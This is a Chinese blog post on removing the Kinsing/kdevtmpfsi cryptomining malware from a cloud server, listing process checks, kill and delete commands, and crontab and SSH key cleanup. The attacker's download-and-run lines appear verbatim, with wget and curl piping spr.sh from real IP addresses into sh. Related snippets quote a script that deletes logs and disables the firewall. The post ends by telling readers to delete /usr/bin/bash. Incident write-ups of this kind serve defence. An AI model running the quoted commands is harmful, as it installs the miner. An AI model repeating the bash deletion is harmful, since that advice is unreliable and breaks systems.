阿里云服务器中挖矿病毒了,名称为 kinsing

最新推荐文章于 2025-04-11 21:47:21 发布
最新推荐文章于 2025-04-11 21:47:21 发布
阅读量4.5k 收藏 6
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40215763/article/details/105953541
版权

五一本来就没有过好,上班来了第一天同事就说页面打不开了
不开心的我就打开看看项目页面,不看不要紧一看还真是见鬼了
赶紧查看一下 top查看了一下

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND     
 25638 root       10 -10     25518                            100                kdevtmpfsi                
 1245 root      10 -10  129488  11804   5484 S   0.3  0.3 136:50.01 AliYunDun                       
12875 hadoop    20   0 2885608 344016  10616 S   0.3  9.2   7:07.82 java                            
13245 hadoop    20   0 3069488 405376  10404 S   0.3 10.9  28:08.32 java                            
25862 root      20   0  939636  12196   5476 S   0.3  0.3   0:30.01 /usr/local/clou                 
    1 root      20   0   51732   3628   2324 S   0.0  0.1   0:56.29 systemd                         
    2 root      20   0       0      0      0 S   0.0  0.0   0:00.04 kthreadd                        
    4 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0H                    
    6 root      20   0       0      0      0 S   0.0  0.0   0:04.44 ksoftirqd/0                     
    7 root      rt   0       0      0      0 S   0.0  0.0   0:00.51 migration/0                     
    8 root      20   0       0      0      0 S   0.0  0.0   0:00.00 rcu_bh                          
    9 root      20   0       0      0      0 S   0.0  0.0   0:51.42 rcu_sched                       
   10 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 lru-add-drain                   
   11 root      rt   0       0      0      0 S   0.0  0.0   0:02.24 watchdog/0                      
   12 root      rt   0       0      0      0 S   0.0  0.0   0:01.35 watchdog/1                      
   13 root      rt   0       0      0      0 S   0.0  0.0   0:00.46 migration/1                     
   14 root      20   0       0      0      0 S   0.0  0.0   0:08.06 ksoftirqd/1                     
   16 root       0 -20       0      0      0 S   0.0  0.0   0:00.00 kworker/1:0H

被第一行的一个鬼进程占满了内存,赶紧看下是哪龟孙 在服务器里运行进程了
真不知道那个龟孙在我的服务器里植入了挖矿的程序
今天真是气不打一出来呀。。。
好了那就干吧
首先根据进程找到这个文件所在地 把它停掉 删除吧

systemctl status 25638

结果展示:

session-5649.scope - Session 5649 of user root
   Loaded: loaded (/run/systemd/system/session-5649.scope; static; vendor preset: disabled)
  Drop-In: /run/systemd/system/session-5649.scope.d
           └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
   Active: active (abandoned) since 一 2019-12-23 10:41:33 CST; 2 days ago
   CGroup: /user.slice/user-0.slice/session-5649.scope
           ├─ 25638/tmp/kdevtmpfsi
           └─18534 ./kinsing1oZIY4Aid7

这个东西在 tmp/kdevtmpfsi 里

cd  tmp

先查看这些进程的pid

ps -aux | grep kinsing

ps -aux | grep kdevtmpfsi

杀死这些中间带有问号的进程

kill  -9   23437
kill  -9   18534

删除这个挖矿进程文件

 rm -rf kdevtmpfsi

再删除这个挖矿进程的脚本
记得这个守护进程的文件也要删掉,找不到的话,也可以用这个命

rm -rf /var/tmp/kinsing

在查找一下有没有残余文件

ls -la

果然有隐藏的文件.删除所有隐藏文件
.xml的删除
这个也删除systemd-private-cec28c7f89e9487eac77f6c235ea9534-chronyd.service-ndSyWG/

find / -name kdevtmpfsi

find / -name kinsing

最后一步至关重要,这个龟孙肯定还会再生,查看一下定时脚本里有没有指定下载的程序

crontab -l 
* * * * * wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1

修改定时器吧:

crontab -e

把里面的东西全部删除

最后一步去查看自己的ssh无密登录,这个可能是最后的后门了

cd ~/.ssh

删除不认识公钥id

清理最后的bash

#80的端口
ps -ef | grep 80

doop@xxxxxxx -p22 curl -L http://45.153.231.180/spr.sh|sh; wget -q -O - http://45.153.231.180/spr.sh|sh;
hadoop   19747 19726  0 Apr29 ?        00:00:00 bash -c curl -L http://45.153.231.180/spr.sh|sh; wget -q -O - http://45.153.231.180/spr.sh|sh;
hadoop   22822 22821  0 Apr28 ?        00:00:00 bash -c curl -L http://45.153.231.180/spr.sh|sh; wget -q -O - http://45.153.231.180/spr.sh|sh;
hadoop   24218 24217  0 Apr28 ?        00:00:00 bash -c curl -L http://45.153.231.180/spr.sh|sh; wget -q -O - http://45.153.231.180/spr.sh|sh;

找出来,干掉它们

[hadoop@master soft]$ ls -l /proc/19747/exe
lrwxrwxrwx 1 hadoop hadoop 0 May  6 10:16 /proc/19747/exe -> /usr/bin/bash
[hadoop@master soft]$ ls -l /proc/22822/exe

斩草要除根

[hadoop@master bin]$ sudo rm -rf bash
[hadoop@master bin]$
龙城烟雨
关注
寄生于 Docker 的病毒 - Kinsing
u012359651的博客
02-22 2023
原创发表于 DavidZ Blog,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接及本声明。 前言 2020 年开年不顺,2019 新型冠状病毒肺炎爆发,从年三十居家隔离到了正月十五,没想到自己的服务器也”感染“上了病毒 - Kinsing(进程的名字,姑且这样称呼)。 发现 偶然看了看服务器状态,发现 CPU 占用一直保持在 100%上下,有些蹊跷。 难道是我的博客...
kinsing挖矿僵尸网络初始化脚本-注释版
makaisghr的专栏
06-01 1550
#!/bin/sh #Linux ulimit命令用于控制shell程序的资源。连接数设置为最大 ulimit -n 65535 #删除系统日志 rm -rf /var/log/syslog #关闭 /tmp /var/tmp 目录不可更改属性 chattr -iua /tmp/ chattr -iua /var/tmp/ #关闭防火墙 UFW,全称 Uncomplicated Firewall,是通过 iptables 实现的防火墙工具 ufw disable #清空iptables iptables
Hadoop漏洞被传挖矿病毒(/tmp/kdevtmpfsi kinsing
lucas5的博客
12-21 446
大数据服务器,被病毒挖矿
干货满满!教你如何应对挖矿病毒, 从零基础到精通,收藏这篇就够了!
最新发布
logic1001的博客
04-11 1249
随着虚拟货币的疯狂炒作,网络黑客将挖矿程序伪装成一个正常的文件,通过。
服务器遭遇挖矿病毒syst3md及其伪装者rcu-sched:原因、症状与解决方案
weixin_44874487的博客
03-15 3395
挖矿病毒syst3md及其伪装者的解决方案,涉及到操作系统的完全解决方案!
处理处理kdevtmpfsi挖矿病毒以及他的守护进程kinsing
Owen_goodman的博客
12-27 8590
服务器CPU资源占用一直处于100%的状态,检查发现是kdevtmpfsi占用导致的,此进程为挖矿程序。 处理步骤如下: kdevtmpfsi 进程处理: 1、# top 查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi 2、# netstat -natp 根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外i...
记录一次云服务器被劫持下载了挖矿病毒的处理过程
黄嚯嚯
01-29 7007
etc被篡改导致系统中病毒 起因: 一年前买的阿里云服务器 , 买了没多久 , 因为没做什么安全措施 , 然后就莫名奇妙服务器被劫持 , 在上面下载了挖矿的一些脚本 ,当时做的处理方式 简单粗暴 直接重置了我的阿里云服务器 , 并且改了密码 , 同时在阿里云的服务器控制台 -> 安全组规则中 关掉了掉了脚本来源的IP地址的出入权限 , 之后的一年 都一直风平浪静 , 知道昨天 , 手贱 ,,,,, 觉得过去很久了 应该没啥了 , 就删掉了那条规则, 也就是等同于放开了那个IP对本机的...
Linux挖矿病毒清理流程
热门推荐
ouxx2009的专栏
03-14 1万+
Linux挖矿病毒清理流程 1.前言: 根据阿里云快讯病毒公布: Redis RCE导致h2Miner蠕虫病毒,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。在以往常见的攻击者或蠕虫中,其大多都沿用登陆redis后写入定时任务或写ssh key的方式进行入侵,这种方式受权限与系统类型影响并不一定能够成功。而此次使用redis加载module的攻击方式,可以直接执行任意指令或拿到shell交互环境,危害
病毒】【CPU使用率为100%】Linux 被 kdevtmpfsi 挖矿病毒入侵
走在搬砖的路上!
11-17 1296
重新安装redis(千万不要赋予root权限)服务,根据客户实际需要对特定IP开放端口(利用防火墙设置,尤其是必须对外(公网)提供服务的情况下),如果只是本机使用,绑定127.0.0.1:6379 ,增加认证口令。最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。crontab -r 表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除。
kdevtmpfsi挖矿病毒解决过程
weixin_43233341的博客
03-03 3017
top 开始cpu消耗在百分80左右,有时会达到99,杀掉进程后几分钟又跳出来, 开始的升级阿里云的高级版,一键查杀,cpu瞬间降到20 继续跟踪。。。 大概两个小时后发现,kdevtmpfsi进程会时不时跳出来,一两秒钟后又自动关闭,此时cpu 再百分20到百分40直接上下波动,如图(正常情况下是稳得) 解决方法 kdevtmpfsi有守护进程。守护进程名称kinsing,需要kill后才...
Linux——kdevtmpfsi(挖矿)进程解决方法与解决过程
Hern(宋兆恒)
03-23 1万+
问题 CPU堵塞(100%)。我这里的主进程是YDService,你的可能和我的不一致。 原因 服务器密码被别人知道 防火墙设置问题 …… 解决方法 1、查看进程,记录下占用CPU的进程PID(包括挖矿主进程PID)命令: top 或 ps aux | less 2、查看异常链接(有助于发现问题缘由),命令: netstat -natp 或 netstat -n...
kdevtmpfsi ,kinsing xxxx 挖矿病毒清理
在IT技术的世界,天天向上↑
01-02 8469
1、top找到挖矿程序(kdevtmpfsi)进程号 CUP 占用100% 若是服务器本身(非容器如docker内)被挖矿 则参考 杀死这个线程 ps -ef |grepkdevtmpfsi ps -ef |grep kinsing 直接kill -9 (PID) 把这个线程干掉了 过一阵子又回来了..... 甚至 find / -name kdevtmpfsi 发现再 ...
服务器中挖矿病毒kinsing的临时处理方法
企业数字化转型卫淼全栈技术工作室
06-02 1179
ps -aux | grep kinsing病毒名,查找病毒进程,然后杀死进程,如果杀死后,还会生成,那就查计划任务是否也被篡改了,crontab -l命令查看当前登录的用户计划任务,如果有异常的计划任务,那么就使用crontab -r命令删除所有的计划任务,删除ssh无密登录的秘钥(cd ~/.ssh )。一般解决kinsing病毒的方法,是top c 查100%的进程,并获取进程pid,然后使用。服务器中挖矿病毒,非常郁闷,删了还继续,最后使用了两种方式,暂时解决病毒问题。3、服务器漏洞升级、打补丁。
挖矿病毒kdevtmpfsi,kinsing进程隐藏解决
张火火博客
05-31 2080
挖矿病毒kdevtmpfsi,kinsing进程隐藏解决
kdevtmpfsi,kinsing挖矿病毒清理
叶梨子
12-30 654
kdevtmpfsi,kinsing挖矿病毒清理 1.top命令 找到挖矿程序(kdevtmpfsi)进程号 CUP 占用100% ps -ef |grep kdevtmpfsi ps -ef |grep kinsing 直接kill -9 (PID) 把这个线程干掉了 过一阵子又回来了,crontab也需要修改 2.一般情况下你第一反应只能找到kdevtmpfsi,kinsing怎么找到的? pstree -a (如果没有下载, yum -y install psmisc) 3.到的并kill线程和它的
linux下面/usr/local和opt目录有何区别?
liuqinhou的博客
06-20 2093
但是这也不是绝对的,也可以把需要命令启动的软件安装在/opt目录,然后在/usr/local/bin目录建立一个链接文件,这样同样可以命令启动这个软件,网上许多Linux软件安装教程都会采用这个方法。其实还有的软件根本不会把软件安装在这两个目录,比如前段时间编译安装了一个游戏叫NetHack,make install命令执行后,安装在了/home目录。/usr/local 目录和 /opt 目录都是用来安装第三方软件的目录,所谓第三方软件其实就是用户自己安装的软件,区别于安装系统时自带的软件。
阿里云挖矿病毒解决
weixin_39766667的博客
02-20 2761
有一次,我们在阿里上的服务器收到这样的短信。【阿里云】尊敬的xxxxxx:经检测您的阿里云服务(ECS实例)xxxxxxxx存在挖矿活动。根据相关法规、政策的规定及监管部门的要求,请您于2023-02-27 00时前完成挖矿问题整改,否则您的服务将被关停,详情请查看邮件或阿里云站内消息通知。若您有其他问题,可登陆阿里云官网在线咨询这就是中了挖矿病毒,如何处理它?
卸载阿里云预安装的软件(云监控(Cloudmonitor) 和 云盾(安骑士))
MR.骑士道
08-25 7237
一、卸载云监控(Cloudmonitor) 1.1、云监控有 Java 版本和 Go 语言版本两种,可以根据其安装目录/usr/local/cloudmonitor/下的文件名判断你的服务器上装的具体是哪一种,我的是 Go语言版本。 1.2、卸载云监控 Go 语言版,官方文档:传送门 # 停止 /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} stop # 从系统服务中移除 /usr/local/cloudmonitor/CmsGoAgent.l..
阿里云服务器挖矿病毒解决方法
慌途L
04-01 4625
公司一直用的阿里云服务器进行生产环境的部署,但是最近某一台服务器上的CPU使用率一直高达95%以上,经过排查项目和代码、定时脚本等,都未发现问题根源,但是有一个文件的占用很高 排查:查看CPU占用率 在服务器上使用命令:top -c 查看进程运行的信息列表 再按下大写的:P 使进程按照CPU使用率排序 类似下图(这里只做演示,非实际情况): 然后可以看到 /usr/local/lib/.libs 占用cpu过高 再接着就是杀进程(这里要排除不是自己的项目所涉及到的) 但是每次杀完之后,CPU就降了下去
阿里云服务器远程管理工具套装使用指南
描述中提到“阿里云服务器远程桌面全家桶”,表明这些工具与阿里云服务器的远程管理相关。阿里云是中国领先的云服务提供商,提供包括计算、存储、网络等在内的多种云服务。远程桌面全家桶则指的是将这些工具组合使用...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值